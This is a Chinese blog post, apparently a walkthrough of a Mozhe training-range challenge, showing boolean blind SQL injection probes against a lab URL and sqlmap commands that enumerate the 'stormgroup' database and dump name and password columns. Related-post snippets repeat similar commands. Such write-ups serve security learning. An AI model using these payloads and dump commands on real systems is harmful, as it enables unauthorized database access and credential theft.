mozheSQL注入漏洞测试(布尔盲注)

最新推荐文章于 2024-04-30 22:07:29 发布
最新推荐文章于 2024-04-30 22:07:29 发布
阅读量3.1k 收藏
点赞数
文章标签: 安全 web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50847719/article/details/122849175
版权

and 1=2空白 1=1正常
在这里插入图片描述
http://219.153.49.228:42670/new_list.php?id=1’and 1=1–+空白
在这里插入图片描述
所以说是数字型
然后判断数据库名字的长度,id=1 and length(database())=1,内容空白。一直试,试到长度为10,正常了
判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ --+,轮流尝试,最后第一位是s
然后我用sqlmap跑出来全称 、 --current-db
在这里插入图片描述
爆表
-D stormgroup --tables
在这里插入图片描述
爆列-D stormgroup -T member --columns
在这里插入图片描述

爆破数据
sqlmap -u “http://<爆破的链接>” -D stormgroup -T member -C name,password --dump ///-C 是要爆破的列,–dump是爆破
在这里插入图片描述
528469
492466
ok了

g子荣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
SQL注入漏洞测试(布尔盲注)
qq_52718293的博客
11-30 5244
一.sqlmap 1.查看库名(测试后发现有5个) python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs 2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables 3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4269
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5052
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
【墨者】SQL注入漏洞测试(布尔盲注)
weixin_48621644的博客
09-15 956
小羊学安全 任重而道远~
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注的python脚本,其中语句需要根据环境条件做改变
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 907
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
安全运维 -- splunk 操作手册
最新发布
leeezp的博客
04-30 918
日常运维操作笔记 (持续更新)
Go语言的map并发读写如何保证安全
技术笔记
04-28 1049
为了保证Go语言中map的并发安全,我们可以使用互斥锁(如sync.Mutex或)来保护对map的访问,或者使用并发安全的map实现(如sync.Map选择哪种方式取决于具体的应用场景和需求。在大多数情况下,使用互斥锁是一个灵活且可靠的选择,而sync.Map则适用于特定的读多写少场景。推荐阅读Golang实战项目分享Golang专栏Go语言异常处理方式。
网络安全实训Day16
Yisitelz的博客
04-26 1337
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
小长假来临,企业借助巡检系统做好安全巡查工作
wsd56735676的博客
04-29 496
小长假期间,企业面临员工离岗、生产活动减少等特殊情况,安全隐患易被忽视。借助巡检系统做好全面安全巡查工作至关重要,包括制定巡检计划和路线、分配和管理巡检任务、识别和处理安全隐患、数据分析和优化、培训和沟通以及应急响应准备,确保企业安全生产。
Ftrans文件外发系统 构建安全可控文件外发流程
文件数据安全交换
04-29 621
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
Windows操作系统安全精讲视频课程
2301_79581760的博客
04-26 960
1.1IT运维职位需要学习的技能.mp4 1-2利用缓存的网络凭据入侵服务器.mp4 1-3信息安全包括哪些方面.mp4 1-4管理本地用户账户和组.mp4 1-5创建检查删除计算机上隐藏的账户.mp4 1-6用户账户控制(UAC)详解.mp4 1-7使用windowsPE新设置管理员密码.mp4 1-8使用LC5找回Windows账户密码.mp4
记录浏览器打开网站拦截提示不安全解决方法
仿站、源码搭建/迁移技术博客
04-27 1286
浏览器可能会因为多种原因显示“不安全”的警告,这通常是由于安全设置不当或配置错误造成的。
网络安全知识点
lv785的博客
04-26 1679
概念:IPSec 是“IP 安全”的缩写,是IETF在开发 IPv6时为保证IP数据报安全而设计的,是IPv6的一个组成 部分、是IPv4的可选项,其基本目的就是把安全机制引入 IP协议。欺骗:指利用主机之间的正常信任关系,通过修改IP数据包中的源地址,以绕开主机或网络访问控制、隐藏攻击来源的攻击技术。概念:入侵检测就是对入侵行为的 检测与发现,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。简要分析RSA算法的安全性得以保障的原因。
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp Suite:首先,确保已正确配置Burp Suite以拦截和修改HTTP请求和响应。您可以在Burp Suite的Proxy选项卡下设置代理,并根据需要配置浏览器或应用程序以使用该代理。 2. 找到注入点:使用Burp Suite的Spider或Repeater工具来找到潜在的注入点。这可以是URL参数、表单字段或Cookie值等。 3. 构造注入语句:使用布尔盲注技术,构造适当的注入语句来测试漏洞。例如,您可以尝试通过在WHERE子句中使用布尔逻辑来判断条件是否为真或假来确定数据库中的信息。 4. 检测响应差异:发送经过注入处理的请求,并观察响应是否有所不同。如果响应正常,可能意味着注入失败;如果响应出现错误或有其他差异,可能意味着注入成功。 5. 使用布尔逻辑验证条件:根据不同的响应,使用布尔逻辑来验证条件是否为真或假。例如,您可以通过在注入语句中使用AND或OR运算符来检查条件。 6. 执行进一步的测试:根据验证的结果,您可以进一步探测和利用漏洞。使用Burp Suite的其他工具和插件来自动化和加快测试过程。 请注意,在进行任何安全测试之前,确保您已获得适当的授权,并仅在合法范围内进行测试。此外,始终遵循道德黑客和安全测试的最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值